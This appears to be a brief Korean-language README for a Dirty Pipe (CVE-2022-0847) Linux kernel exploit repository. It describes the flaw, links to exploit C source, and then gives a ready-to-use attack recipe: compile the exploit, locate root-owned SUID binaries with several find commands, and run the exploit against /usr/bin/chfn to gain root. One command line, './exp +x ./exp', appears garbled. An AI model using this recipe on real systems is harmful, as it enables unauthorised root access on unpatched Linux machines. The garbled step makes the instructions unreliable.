
CVE-2022-0847-DirtyPipe-Exploit
3월 7일, 해외 보안 연구원 Max Kellermann이 Linux 커널에 존재하는 로컬 권한 상승 취약점 CVE-2022-0847을 공개한 블로그를 게시했습니다: https://dirtypipe.cm4all.com/
CVE-2022-0847은 Linux 커널 5.8 이상 버전에 존재하는 로컬 권한 상승 취약점입니다. 공격자는 이 취약점을 이용하여 임의의 읽기 가능 파일의 데이터를 덮어쓰기 할 수 있으며, 이를 통해 일반 사용자 권한을 루트 권한으로 상승시킬 수 있습니다.
CVE-2022-0847의 취약점 원리는 CVE-2016-5195 (Dirty Cow)와 유사하지만, 더 쉽게 악용될 수 있습니다. 취약점 작성자는 이 취약점을 "Dirty Pipe"라고 명명했습니다.
Link: https://haxx.in/files/dirtypipez.c
Author: Max Kellermann [email protected]
gcc -o exp exploit.c
./exp +x ./exp
# 查找suid文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
./exp /usr/bin/chfn
